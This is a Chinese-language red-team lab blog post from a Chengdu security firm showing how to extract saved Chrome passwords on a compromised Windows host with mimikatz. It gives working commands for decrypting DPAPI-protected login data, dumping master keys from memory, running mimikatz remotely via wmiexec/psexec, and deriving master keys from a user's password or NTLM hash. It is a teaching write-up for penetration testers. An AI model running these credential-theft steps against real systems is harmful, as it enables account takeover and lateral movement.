使用mimikatz導出chrome密碼_成都伍紀信息科技有限公司

新聞動态 NEWS

咨詢服務熱線

400-6446-808

創安實驗室專欄

您的當前位置:首頁 > 創安實驗室專欄

使用mimikatz導出chrome密碼

發布者：創信華通(tōng) 發布時(shí)間(jiān)：2022-08-01 浏覽量：341次

寫在前面

古語有(yǒu)雲：“學如逆水(shuǐ)行(xíng)舟，不進則退。”面對如今随時(shí)都在變化的網絡安全環境更是如此。為(wèi)此，創信華通(tōng)微信公衆号特開(kāi)設“滲透專欄”，以記錄創信華通(tōng)創安攻防實驗室在滲透技(jì)術(shù)上(shàng)的探索，加強同行(xíng)間(jiān)的交流，相互學習，共同進步。

✎使用mimikatz導出chrome密碼

2022.07.25

模拟場(chǎng)景

在獲取某PC本地administrator的權限情況下，導出使用該PC機域普通(tōng)賬号的密碼。

受害機ip：

192.168.3.4

受害機賬戶：

· 本地管理(lǐ)員：administrator/toor

· 域普通(tōng)賬戶：beta\fengjie/qqq123!@#

加密機制(zhì)簡介

chrome儲存的明(míng)文密碼時(shí)使用windows提供的DPAPI進行(xíng)對稱加密來(lái)保證安全性。加解密的密鑰稱為(wèi)master key。master key被用戶登錄密碼、SID和(hé)16字節随機數(shù)加密後保存在Master Key file（%APPDATA%\Microsoft\Protect\%SID%）中。

○

最簡單的情況：A用戶拖A自己的密碼

dpapi::chrome /in:'C:\Users\fengjie\AppData\Local\Google\Chromr\User

Data\Default\Login Data' /unprotect

○

在A用戶登陸狀态B解密A的chrome密碼

在用戶登陸狀态下可(kě)以直接用procdump或者mimikatz直接從內(nèi)存中獲取master key。

privilege::debug

sekurlsa::dpapi

python wmiexec.py administrator:toor@192.168.3.4 'c:\users\public\mimikatz.exe "privilege::debug" "sekurlsa::dpapi" exit'

Alt text

獲取到masterkey

0bf0be64d4dc768a543b3a12d7c5210d184c07a3861cad8f2bd8b7bbacc60fd0e06e955b6dad057d070d1ce3b2bb331fd8dbce6efad08808f1849e4f4ef26d80

1b81b1c9cb66a3f93b58f85948e8ce53779c6e5d

接下來(lái)用mimikatz一把梭就可(kě)以了

python wmiexec.py administrator:toor@192.168.3.4 'cd c:\users\public && Minimimini64.exe "dpapi::chrome

/in:\"C:\Users\fengjie\AppData\Local\Google\Chrome\User Data\Default\Login Data\" /masterkey:1b81b1c9cb66a3f93b58f85948e8ce53779c6e5d" exit '

最開(kāi)始用wmiexec并未解密成功

Alt text

後來(lái)發現是wmiexec的鍋換成psexec就好了（用smbexec也可(kě)以，懷疑是因為(wèi)用wmiexec時(shí)令牌完整性受限的原因，知道(dào)的師(shī)傅請(qǐng)教我一手）

Alt text

○

在A用戶離線狀态B解密A的chrome密碼

現在用mimikatz重新抓已經抓不到fengjie的master key了

Alt text

用戶明(míng)文密碼已知

這種情況下有(yǒu)兩種方法可(kě)以選擇。

1.如果我們知道(dào)fengjie的明(míng)文密碼，可(kě)以用runas降權(或者進行(xíng)一些(xiē)spwan的操作(zuò)降權)，降權之後又回到了最簡單的情況。（因為(wèi)runas需要交互式shell，所以這種方法比較雞肋）

runas /user:fengjie@beta.com "cmd.exe"

mimikatz dpapi::chrome /in:”%localappdata%\Google\Chrome\User

Data\Default\Cookies” /unprotect

2.在沒有(yǒu)交互式的情況下可(kě)以直接用mimikatz直接算(suàn)出master key。

dpapi::masterkey

/in:"c:\Users\fengjie\AppData\Roaming\Microsoft\Protect\S-1-5-21-2274946182-2013957047-1890316882-1632\59a94dbc-6dbb-4d51-bec0-edebc6f2e9f8"

/password:qqq123!@#

Alt text

拿(ná)到master key後情況又相當于又轉換回了用戶在線的情景。

用戶明(míng)文密碼未知，知道(dào)NTLM hash

dpapi::masterkey

/in:"c:\Users\fengjie\AppData\Roaming\Microsoft\Protect\S-1-5-21-2274946182-2013957047-1890316882-1632\59a94dbc-6dbb-4d51-bec0-edebc6f2e9f8"

/hash:632f6adad4510099d676724bfb87c6ee

Alt text

總結

簡單的說就是三種情況：

●

A用戶獲取自己chrome密碼不需要知道(dào)master key

●

A獲取B用戶，如果B用戶在線，那(nà)麽可(kě)以直接從內(nèi)存中抓取出B的maste key

●

A獲取B用戶，B不在線，就需要用b用戶的明(míng)文密碼或者NTLM hash計(jì)算(suàn)出master key,在回到上(shàng)面一步。

本文由創信華通(tōng)創安攻防實驗室編輯。

如有(yǒu)侵權，請(qǐng)聯系後台。

●

創安攻防實驗室

創安攻防實驗室，是成都伍紀信息科技有限公司旗下的技(jì)術(shù)研究團隊，成立于2021年9月，主要研究紅藍(lán)對抗、重大(dà)安全保障、應急響應等方向。

創安攻防實驗室圓滿完成了多(duō)次公安舉辦的重要網絡安全保障和(hé)攻防演習活動，并積極參加各類網絡安全競賽，屢獲殊榮。

創安攻防實驗室秉承創信華通(tōng)的發展理(lǐ)念，緻力打造國內(nèi)一流網絡安全團隊。

·END·

上(shàng)一條：創信華通(tōng)關于CVE-2022-0847（髒牛提權）漏洞複現

下一條：msf漏洞驗證

返回列表